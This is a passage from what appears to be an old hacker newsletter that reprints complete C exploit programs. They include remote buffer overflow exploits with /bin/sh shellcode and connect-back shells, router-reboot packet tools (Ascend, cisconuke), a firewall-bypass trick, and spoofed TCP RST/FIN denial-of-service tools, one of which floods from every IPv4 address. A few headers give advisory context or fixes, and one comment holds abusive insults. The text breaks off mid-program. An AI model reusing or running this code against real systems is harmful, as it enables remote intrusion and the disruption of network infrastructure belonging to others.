#include <sys/types.h>
#include <netdb.h>
#include <time.h>
#include <netinet/in.h>
#define LEN 1200
#define OFFSET 0
#define ADDR 0xbfffd7a4
char *sc="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
void get_incoming(int r) {
int s, l=1; struct sockaddr_in sa, ra;
bzero(&sa,sizeof(sa));
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=htonl(INADDR_ANY);
sa.sin_port=htons(16474);
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
perror("socket"),exit(1);
setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&l,sizeof(l));
if(bind(s,(struct sockaddr *)&sa,sizeof(sa))<0)
perror("bind"),exit(1);
if(listen(s,1))
perror("listen"),exit(1);
write(r,"16474",6);
if(accept(s,&sa,&l)<0)
perror("accept"),exit(1);
}
int con_outgoing(char *h) {
int s, i; struct sockaddr_in a; struct hostent *e;
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
perror("socket"),exit(1);
if((i=inet_addr(h))==INADDR_NONE) {
if((e=gethostbyname(h))==NULL)
perror("gethostbyname"),exit(1);
bcopy(e->h_addr,&i,sizeof(i)); }
bzero(&a,sizeof(a));
a.sin_family=AF_INET;
a.sin_addr.s_addr=i;
a.sin_port=htons(544);
if(connect(s,(struct sockaddr *)&a,sizeof(a))<0)
perror("connect"),exit(1);
return s;
}
void bus(int s) {
int i; fd_set r; char b[1024];
for(;;) {
FD_ZERO(&r); FD_SET(0,&r); FD_SET(s,&r);
if((i=select(s+1,&r,NULL,NULL,NULL))==-1)
perror("select"),exit(1);
if(i==0) fprintf(stderr,"closed\n"),exit(0);
if(FD_ISSET(s,&r)) {
if((i=read(s,b,sizeof(b)))<1)
fprintf(stderr,"closed\n"),exit(0);
write(1,b,i); }
if(FD_ISSET(0,&r)) {
if((i=read(0,b,sizeof(b)))<1)
fprintf(stderr,"closed\n"),exit(0);
write(s,b,i); } }
}
void main(int ac, char *av[])
{
int s, i, j, a=ADDR, o=OFFSET;
int l, h;
char b[LEN];
if(ac<2) {
fprintf(stderr,"%s hostname [addr] [offset]\n",*av);
exit(1);
}
a+=(ac>2)?atoi(av[2]):0;
o+=(ac>3)?atoi(av[3]):(4-(strlen(av[1])%4));
o%=4;
if(o<0) o+=4;
l=(ac>4)?atoi(av[4]):-10;
h=(ac>5)?atoi(av[5]):10;
fprintf(stderr,"addr=%p, offset=%d\n",a,o);
if(isupper(((char *)&a)[0]) ||
isupper(((char *)&a)[1]) ||
isupper(((char *)&a)[2]) ||
isupper(((char *)&a)[3]))
fprintf(stderr,"error: addr contains uppercase\n"),exit(0);
s=con_outgoing(av[1]);
get_incoming(s);
sprintf(&b[0],"AUTHV0.1blahblah");
*(int *)(b+16)=htonl(LEN);
b[20]=4; b[21]=7; b[22]=123;
write(s,b,23);
for(i=0;i<LEN-8-strlen(sc)-1;i++) b[i]=0x90;
bcopy(sc,b+i,strlen(sc)+1);
for(i=LEN-8;i<LEN;i++) b[i]=0x00;
for(i=255+o+l*4;i<=255+o+h*4;i+=4) *(int *)(b+i)=(a-4);
*(int *)(b+251+o)=a;
write(s,b,LEN);
bus(s);
}
/* www.hack.co.za [22 May]*/
@HWA
245.0 [IND] ascend remote dos attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug.
* see ftp.ascend.com.
*/
/*
* Ascend Kill II - C version
*
* Released: 3/16/98
*
* Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
* (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
*
* Sends a specially constructed UDP packet on the discard port (9)
* which cause Ascend routers to reboot. (Warning! Ascend routers will
* process these if they are broadcast packets.)
*
* Compiled under RedHat 5.0 with glibc.
*
* NOTE: This program is NOT to be used for malicous purposes. This is
* intenteded for educational purposes only. By using this program
* you agree to use this for lawfull purposes ONLY.
*
* It is worth mentioning that Ascend has known about this bug for quite
* some time.
*
* Fix:
*
* Filter inbound UDP on port 9.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>
#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }
/* This magic packet was taken from the Java Configurator */
char ascend_data[] =
{
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53};
unsigned short
in_cksum (addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];
char crashme[500];
int i;
ip.ihl = 5;
ip.version = 4;
ip.tos = rand () % 100;;
ip.tot_len = htons (28 + datalen);
ip.id = htons (31337 + (rand () % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum ((char *) &ip, sizeof (ip));
udp.source = htons (sport);
udp.dest = htons (dport);
udp.len = htons (8 + datalen);
udp.check = (short) 0;
memcpy (packet, (char *) &ip, sizeof (ip));
memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
/* Append random garbage to the packet, without this the router
will think this is a valid probe packet and reply. */
for (i = 0; i < 500; i++)
crashme[i] = rand () % 255;
memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
(struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}
unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}
void
main (argc, argv)
int argc;
char **argv;
{
unsigned int saddr, daddr;
struct sockaddr_in sin;
int s, i;
if (argc != 3)
errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(saddr = lookup (argv[1])))
err ("Unable to lookup source address.\n");
if (!(daddr = lookup (argv[2])))
err ("Unable to lookup destination address.\n");
sin.sin_family = AF_INET;
sin.sin_port = 9;
sin.sin_addr.s_addr = daddr;
if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1)
{
perror ("sendpkt_udp");
err ("Error sending the UDP packet.\n");
}
}
/* www.hack.co.za [20 May]*/
@HWA
246.0 [IND] ftp-ozone.c cisco remote bug by dug song.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
dugsong@monkey.org
/*
ftp-ozone.c
Demonstrate a basic layer violation in "stateful" firewall
inspection of application data (within IP packets - @#$@#$!):
http://www.checkpoint.com/techsupport/alerts/pasvftp.html
Dug Song <dugsong@monkey.org>
Affected:
Checkpoint Software Firewall-1 4.0
Checkpoint Software Firewall-1 3.0
Cisco PIX Firewall 5.1
Cisco PIX Firewall 5.0
Cisco PIX Firewall 4.4(4)
Cisco PIX Firewall 4.3
Cisco PIX Firewall 4.2.2
Cisco PIX Firewall 4.2.1
Cisco PIX Firewall 4.1.6b
Cisco PIX Firewall 4.1.6
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#define PAD_LEN 128 /* XXX - anything on BSD, but Linux is weird */
#define GREEN "\033[0m\033[01m\033[32m"
#define OFF "\033[0m"
jmp_buf env_buf;
void
usage(void)
{
fprintf(stderr, "Usage: ftp-ozone [-w win] <ftp-server> <port-to-open>\n");
exit(1);
}
u_long
resolve_host(char *host)
{
u_long addr;
struct hostent *hp;
if (host == NULL) return (0);
if ((addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL)
return (0);
memcpy((char *)&addr, hp->h_addr, sizeof(addr));
}
return (addr);
}
#define UC(b) (((int)b)&0xff)
int
ftp_pasv_reply(char *buf, int size, u_long ip, u_short port)
{
char *p, *q;
port = htons(port);
p = (char *)&ip;
q = (char *)&port;
return (snprintf(buf, size, "227 (%d,%d,%d,%d,%d,%d)\r\n",
UC(p[0]), UC(p[1]), UC(p[2]), UC(p[3]),
UC(q[0]), UC(q[1])));
}
void handle_timeout(int sig)
{
alarm(0);
longjmp(env_buf, 1);
}
void
read_server_loop(int fd, int timeout, int pretty)
{
char buf[2048];
int rlen;
if (!setjmp(env_buf)) {
signal(SIGALRM, handle_timeout);
alarm(timeout);
for (;;) {
if ((rlen = read(fd, buf, sizeof(buf))) == -1)
break;
if (pretty) {
buf[rlen] = '\0';
if (strncmp(buf, "227 ", 4) == 0)
printf("[" GREEN "%s" OFF "]\n", buf);
else printf("[%s]\n", buf);
}
else write(0, buf, rlen);
}
alarm(0);
}
}
int
main(int argc, char *argv[])
{
int c, fd, win, len;
u_long dst;
u_short dport;
struct sockaddr_in sin;
char buf[1024];
win = PAD_LEN;
while ((c = getopt(argc, argv, "w:h?")) != -1) {
switch (c) {
case 'w':
if ((win = atoi(optarg)) == 0)
usage();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (argc != 2)
usage();
if ((dst = resolve_host(argv[0])) == 0)
usage();
if ((dport = atoi(argv[1])) == 0)
usage();
/* Connect to FTP server. */
memset(&sin, 0, sizeof(sin));
sin.sin_addr.s_addr = dst;
sin.sin_family = AF_INET;
sin.sin_port = htons(21);
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
exit(1);
}
if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &win, sizeof(win)) == -1) {
perror("setsockopt");
exit(1);
}
if (connect(fd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
perror("connect");
exit(1);
}
read_server_loop(fd, 10, 0);
/* Send padding. */
len = win - 5; /* XXX - "500 '" */
memset(buf, '.', len);
if (write(fd, buf, len) != len) {
perror("write");
exit(1);
}
/* Send faked reply. */
len = ftp_pasv_reply(buf, sizeof(buf), dst, dport);
if (write(fd, buf, len) != len) {
perror("write");
exit(1);
}
read_server_loop(fd, 5, 1);
printf("[ now try connecting to %s %d ]\n", argv[0], dport);
for (;;) {
;
}
/* NOTREACHED */
exit(0);
}
/* w00w00. */
/* www.hack.co.za [20 May]*/
@HWA
247.0 [IND] reset_state.c cisco remote dos attack by vortexia.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
andrew@cnsec.co.za
/* reset_state.c (c) 2000 Citec Network Securities */
/* The code following below is copyright Citec Network Securities */
/* Code was developed for testing, and is written to compile under */
/* FreeBSD */
/*
Hi All, just a bit of a security notification.
Cisco has been informed of this problem and Im waiting for a fix for the
problem, Ive also noted that various other firewalls are effected by this
code, though if you wanna know if whatever you are running is effected,
you will have to test it.
A brief rundown of the problem.
If you run routable ips on your internal interface on your pix, and
routeable ips on your external interface, so the pix is not running nat,
the pix keeps a state table of everything going on. Anything that is not
in your state table that attempts to come in from the outside is denied,
even if there is a conduit in place to permit anything. Which means that
you have to establish a connection from your internal network to your
external network before anything external can send data back. This is a
really nice feature, unfortunatly there is a big of a bug that I found in
this. While testing on in house equipment for possible flaws, as we
continually test various products, I found the following.
On recieving a RST packet (TCP Reset) from a given host with the correct
source and destination port, the PIX will drop the state entry for that
particular connection, which means the tcp connection dies due to the fact
that no state entry the external box can no longer talk to the internal
box.
So, if we take a standard raw ip packet, give it a tcp header, and set the
source ip as a machine that your internal box is connected to, and the
destination ip as your internal machine, set the source port on the
spoofed ip as the port the person is connected to, set your destination
port on your destination ip cyclically to possible source ports on his
side, and send resets, it will drop the persons state table entry, cutting
him off from the box he is connected to.
Now, the one question I asked when I wrote this, is why does this work,
why is there no seq/ack checking on RST packets, this was answered in the
TCP RFC, saying that seq/ack numbers are not checked on RST packets,
however they are checked on FIN packets, hence using FIN packets for this
test is futile without sequence prediction code.
There is a simple work around for this problem however, and anyone wishing
to know the details of that is free to email me at andrew@cnsec.co.za for
details.
Below I have posted example code to show the exploit and how it works, and
hopefully this will be useful to someone on this list and help fix a
fairly nasty denial of service problem.
Many Thanks
Andrew Alston
Citec Network Securities (Director)
Phone: (011) 787 4241
Fax: (011) 787 4259
Email: andrew@cnsec.co.za
*/
#define __BSD_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
struct slist {
struct in_addr spoof;
struct slist *link;
}; /* Spoof list */
int
main(int argc, char *argv[])
{
int i, int2;
int sock; /* Socket stuff */
int on = 1; /* Socket stuff */
struct sockaddr_in sockstruct; /* Socket stuff */
struct ip *iphead; /* IP Header pointer */
struct tcphdr *tcphead; /* TCP Header pointer */
char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)];
/* Our reset packet */
int seq, ack; /* Sequence and Acknowledgement #'s */
FILE *spooffile; /* Spoof file */
char *buffer; /* Spoof file read buffer */
struct slist *scur, *sfirst; /* Spoof linked list pointers */
char src[20], dst[20]; /* Work around for inet_ntoa static */
/* Pointers when using printf() */
int sourcefrom, sourceto, destfrom, destto; /* CMD Line ports */
int target; /* Target address from inet_addr() */
if(argc < 6) {
fprintf(stderr, "Usage: %s spoof_file target sps spe dps dpe\n"
"target = your victim\n"
"sps = Source port start\n"
"spe = Source port end\n"
"dps = Destination port start\n"
"dpe = Destination port end\n", argv[0]);
exit(-1);
}
else {
sourcefrom = atoi(argv[3]);
sourceto = atoi(argv[4]);
destfrom = atoi(argv[5]);
destto = atoi(argv[6]);
};
if(sourcefrom > sourceto) {
printf("Error, start source port must be less than end source port\n");
exit(-1);
}
else if(destfrom > destto) {
printf("Error, start dest port must be less than end dest port\n");
exit(-1);
};
printf("Used spoof file %s\n"
"Destination: [%s] ports: [%d -> %d]\n"
"Target source ports: [%d -> %d]\n",
argv[1], argv[2], destfrom, destto, sourcefrom, sourceto);
sleep(1);
bzero(evilpacket, sizeof(evilpacket));
/* Clean our reset packet */
sfirst = malloc(sizeof(struct slist));
scur = sfirst;
scur->link = NULL; /* Setup our spoof linked list */
if(!(buffer = malloc(25))) {
perror("malloc");
exit(-1);
}; /* Allocate for read buffer */
if ((spooffile = fopen((char *) argv[1], "r")) <= 0) {
perror("fopen");
exit(-1); /* Open our spoof file */
} else {
while (fgets(buffer, 25, spooffile)) { /* Read till EOF */
if (!(inet_aton(buffer, &(scur->spoof))))
printf("Invalid address found in victim file.. ignoring\n");
else {
scur->link = malloc(sizeof(struct slist));
scur = scur->link;
scur->link = NULL; /* Cycle l.list */
}
}; /* End of while loop */
}; /* End of if {} else {} */
free(buffer); /* Free up our read buffer */
fclose(spooffile); /* Close our spoof file */
scur = sfirst; /* Set spoof list current to first */
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
} /* Allocate our raw socket */
if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on, sizeof(on)) < 0) {
perror("setsockopt");
exit(-1);
} /* Set socket options for raw iphead */
sockstruct.sin_family = AF_INET;
iphead = (struct ip *) evilpacket;
tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip));
/* Align ip and tcp headers */
iphead->ip_hl = 5; /* Ip header length is 5 */
iphead->ip_v = 4; /* ipv4 */
iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
/* Length of our total packet */
iphead->ip_id = htons(getpid()); /* Packet ID == PID # */
iphead->ip_ttl = 255; /* Time to live == 255 */
iphead->ip_p = IPPROTO_TCP; /* TCP Packet */
iphead->ip_sum = 0; /* No checksum */
iphead->ip_tos = 0; /* 0 Type of Service */
iphead->ip_off = 0; /* Offset is 0 */
tcphead->th_win = htons(512); /* TCP Window is 512 */
tcphead->th_flags = TH_RST; /* Reset packet */
tcphead->th_off = 0x50; /* TCP Offset 0x50 */
iphead->ip_dst.s_addr = inet_addr(argv[2]);
srand(getpid()); /* Seed for rand() */
while (scur->link != NULL) {
seq = rand() % time(NULL); /* Randomize our #'s */
ack = rand() % time(NULL); /* Randomize ack #'s */
sockstruct.sin_port = htons(rand() % time(NULL));
iphead->ip_src = scur->spoof; /* Set the spoofed address */
sockstruct.sin_addr = scur->spoof;
for(i = sourcefrom; i <= sourceto; i++) {
for(int2 = destfrom; int2 <= destto; int2++) {
usleep(2); /* Sleep 5ms between packets */
seq += (rand() %10)+250;
ack += (rand() %10)+250;
tcphead->th_seq = htonl(seq);
/* Set sequence number */
tcphead->th_ack = htonl(ack);
/* Set ack number */
tcphead->th_dport = htons(int2);
/* Set destination port */
tcphead->th_sport = htons(i);
/* Set source port */
snprintf(src, 20, "%s", inet_ntoa(iphead->ip_src));
snprintf(dst, 20, "%s", inet_ntoa(iphead->ip_dst));
/* Copy info to src and dst for printing */
printf("TCP RESET: [%s:%d] -> [%s:%d]\n", src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport));
sendto(sock, &evilpacket, sizeof(evilpacket), 0x0,
(struct sockaddr *) & sockstruct, sizeof(sockstruct));
/* Send our evil packet */
};
};
scur = scur->link; /* Cycle the spoof ips */
}
scur = sfirst;
return (1);
};
/* www.hack.co.za [20 May]*/
@HWA
248.0 [IND] ftpexp.c (Version 6.2/Linux-0.10) ftpd overflow by digit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
teddi@linux.is
/*
* FTP server (Version 6.2/OpenBSD/Linux-0.10) and 6.3 ??
* getwd() overflow. linux exploit, remote penetration.
*
* author: DiGiT - teddi@linux.is
*
* greets: p0rtal && \x90 & me for discovering this bug.
* big thx to duke for ADMwuftp.
* #hax, #!ADM
* Run like: (./ftpexp 0 dir ; cat) | nc victim.com 21
* offset vary from -500 - +500
* PRIVATE EXPLOIT$#%#%#$
*/
#include <stdio.h>
#include <string.h>
// need to find for other, tested of slack 3.6.
// #define RET 0xbfffec5c
#define RET 0xbfffeb30
#define USERNAME "ftp"
#define PASSWORD "lamer@"
char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\x90\x90\x31\xc0\x31\xdb\xb0\x17"
"\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
"\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
"\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0"
"\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
"\xcd\x80\x31\xc0\x8d\x5e\x05\xb0"
"\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
"\xd0\xff\xf7\xdb\x31\xc9\xb1\x10"
"\x56\x01\xce\x89\x1e\x83\xc6\x03"
"\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10"
"\xcd\x80\x31\xc0\x88\x46\x07\x89"
"\x76\x08\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
"\x80\xe8\xac\xff\xff\xff";
void mkd(char *dir)
{
char blah[1024], *p;
int n;
bzero(blah, sizeof(blah));
p = blah;
for(n=0; n<strlen(dir); n++){
if(dir[n] == '\xff'){
*p = '\xff';
p++;
}
*p = dir[n];
p++;
}
printf("MKD %s\r\n", blah);
printf("CWD %s\r\n", blah);
}
void
main (int argc, char *argv[])
{
char *buf;
char buf2[200];
char buf1[600];
char dir2[256];
char *p;
char *q;
char tmp[256];
int a;
int offset;
int i;
if (argc > 1) offset = atoi(argv[1]);
else offset = 0;
fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
fprintf(stderr, "shell size = %d\n", sizeof(shellcode));
dir2[231] = '\0';
memset(dir2, '\x90', 230);
printf("user %s\r\n", USERNAME);
printf("pass %s\r\n", PASSWORD);
printf("cwd %s\r\n", argv[2]);
memset(buf1, 0x90, 600);
p = &buf1[sizeof(argv[2])];
q = &buf1[599];
*q = '\x00';
while(p <= q) {
strncpy(tmp, p, 100);
mkd(tmp);
p+=100; }
mkd(dir2);
mkd(shellcode);
mkd("bin");
mkd("sh");
memset(buf2, 0x90, 100);
// var 96
for(i=4; i<96; i+=4)
*(long *)&buf2[i] = RET + offset;
p = &buf2[0];
q = &buf2[99];
strncpy(tmp, p, 100);
mkd(tmp);
printf("pwd\r\n");
}
/* www.hack.co.za [20 May]*/
@HWA
249.0 [IND] killsentry.c linux/misc remote port sentry killer by vortexia.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
andrew@cnsec.co.za
/* killsentry.c (c) 1999 Vortexia / Andrew Alston
Excuse the crappy coding, this code was written when I was very bored,
had nothing better to do, and felt like proving the point that automatic
firewalling is a bad idea. The code spoofs FIN packets from sequential
internet hosts, starting at 1.0.0.0 and going right through to
255.255.255.255, sending 15 packets from each, one packet each to port
100 to 115. Feel free to modify this code, if you use the code for
anything, please give me credit where it is due.
I hold no responsibility for anything this code is used for, I give no
guarantees that this code works, and I hold no responsibility for
anything this code does to any system you run it on. If you screw up with
it, its your problem, not mine.
The code compiles 100% fine with no warnings on FreeBSD 3.2, I dont know
about any other platforms or systems.
Greets and shoutouts:
Wyze1 - Thanks for the moral support, here is something you may use in
Forbidden Knowledge
Sniper - My partner in crime, you rock
Timewiz - What can I say, thanks for ideas for projects still coming
Moe1 - For all the information Ive had from you - Its appreciated
Uglykidjoe - For things said and done - I owe you
Hotmetal - A general greet
Bretton Vine - Dont worry the underground you hate so much still loves you
Everyone else in #hack on irc.electrocity.com - You guys rock
Curses, fuckoffs, and the like -
Logik - Get a clue, skript kiddie life aint the way
Gaspode - I dont think I even need this - a major FUCK YOU
and I hope you get castrated with a rusty spoon -
take your god like attitude and shove it up your ass
Sunflower - May you fall pregnant to one of the many ircops you screw
Anyone else that I dislike but cant think of right now - FUCK YOU
Anyone who dislikes me - FUCK YOU
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#define TARGETHOST "YOURTARGETHERE"
int main() {
int octet1, octet2, octet3, octet4;
int i;
int sock;
int on = 1;
struct sockaddr_in sockstruct;
struct ip *iphead;
struct tcphdr *tcphead;
char ipkill[20];
char evilpacket[sizeof(struct ip) + sizeof(struct tcphdr)];
struct in_addr spoof, target;
int seq, ack;
bzero(&evilpacket, sizeof(evilpacket));
// Very bad way to generate sequence numbers
srand(getpid());
seq = rand()%time(NULL);
ack = rand()%time(NULL);
target.s_addr=inet_addr(TARGETHOST);
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
}
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
perror("setsockopt");
exit(-1);
}
sockstruct.sin_family = AF_INET;
iphead = (struct ip *)evilpacket;
tcphead = (struct tcphdr *)(evilpacket + sizeof(struct ip));
iphead->ip_hl = 5;
iphead->ip_v = 4;
iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
iphead->ip_id = htons(getpid());
iphead->ip_ttl = 255;
iphead->ip_p = IPPROTO_TCP;
iphead->ip_dst = target;
iphead->ip_sum = 0;
iphead->ip_tos = 0;
iphead->ip_off = 0;
tcphead->th_sport = htons(80);
tcphead->th_seq = htonl(seq);
tcphead->th_ack = htonl(ack);
tcphead->th_win = htons(512);
tcphead->th_flags = TH_FIN;
tcphead->th_off = 0x50;
for(octet1 = 1; octet1 <= 255; octet1++)
for(octet2 = 0; octet2 <= 255; octet2++)
for(octet3 = 0; octet3 <= 255; octet3++)
for(octet4 = 0; octet4 <= 255; octet4++) {
bzero(ipkill, 20);
sprintf(ipkill, "%d.%d.%d.%d", octet1, octet2, octet3, octet4);
for(i = 100; i <= 115; i++) {
tcphead->th_dport = htons(i);
sockstruct.sin_port = htons(i);
spoof.s_addr = inet_addr(ipkill);
iphead->ip_src = spoof;
sockstruct.sin_addr = spoof;
sendto(sock,&evilpacket,sizeof(evilpacket),0x0,(struct
sockaddr *)&sockstruct, sizeof(sockstruct));
}
}
return(1);
};
/* www.hack.co.za [20 May]*/
@HWA
249.0 [IND] cisconuke.c cisco http mass dos tool. ;))
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/cisco/cisconuke.c
NOTE: Distributed by hack.co.za don't complain to me! - Ed
/*
- PRIVATE Do NOT distribute PRIVATE -
Cisco IOS deficiency (web-server interface) allows an arbitrary
router to be rebooted.
1. Create an IP address list (or hostnames).
2. gcc -o cisconuke cisconuke.c
3. ./cisconuke ip-address-list
4. If the target's a Cisco with open TCP/80, it goez b00m.
We use a timeout because, in the event that a host resolves but is
down, waiting for ETIMEDOUT would slow your DOSing down. Adjust if
necessary (slow links etc).
Comment out the VERBOSE #define if you don't want to see what's
happening.
*/
#define VERBOSE
#define TIMEOUT 10
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
sigjmp_buf env;
u_long
resolve_host(u_char *host)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host)) == -1)
{
host_ent = gethostbyname(host);
if (!host_ent) return((u_long)0);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
}
return(addr.s_addr);
}
void
net_timeout(void)
{
alarm(0);
siglongjmp(env, 1);
}
int
nuke_cisco(u_long dst_ip)
{
struct sockaddr_in sin;
u_char crash[] = "GET /\%\%\n\n";
int sock;
alarm (0);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == -1)
{
perror("socket allocation");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = dst_ip;
if (sigsetjmp(env, 1))
{
/* Timeout. */
close(sock);
return(-1);
}
alarm(TIMEOUT);
signal(SIGALRM, (void *)net_timeout);
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
{
close(sock);
return(-1);
}
alarm (0);
if (write(sock, crash, strlen(crash)) != strlen(crash))
{
close(sock);
fprintf(stderr, "\nWarning: truncated write()\n");
return(-1);
}
close(sock);
return(0);
}
int
main(int argc, char **argv)
{
FILE *filez;
struct in_addr addr;
u_long dst_ip = 0;
u_char host[255] = {0};
int nuked = 0, notnuked = 0;
if (argc != 2)
{
fprintf(stderr, "\nusage:\t%s ip_list\n\n", argv[0]);
exit(-1);
}
filez = fopen(argv[1], "r");
if (!filez)
{
fprintf(stderr, "Can't open IP address list file.\n");
exit(-1);
}
while (fgets(host, sizeof(host) - 1, filez) > 0)
{
host[strlen(host) - 1] = 0;
host[strlen(host) ] = 0;
dst_ip = resolve_host(host);
if (dst_ip)
{
#ifdef VERBOSE
addr.s_addr = dst_ip;
fprintf(stderr, "Resolved host `%s`, killing.. ", inet_ntoa(addr));
#endif /* VERBOSE */
if (!nuke_cisco(dst_ip))
{
#ifdef VERBOSE
fprintf(stderr, "success.\n");
nuked++;
#endif /* VERBOSE */
}
else
{
#ifdef VERBOSE
fprintf(stderr, "can't connect to TCP/80\n");
notnuked++;
#endif /* VERBOSE */
}
}
else
{
#ifdef VERBOSE
fprintf(stderr, "Can't resolve %s\n", host);
notnuked++;
#endif /* VERBOSE */
}
memset(host, 0, sizeof(host));
}
fprintf(stderr, "\nCompleted run:\n"
"Obtained a successful connection and sent crash: %d hosts.\n"
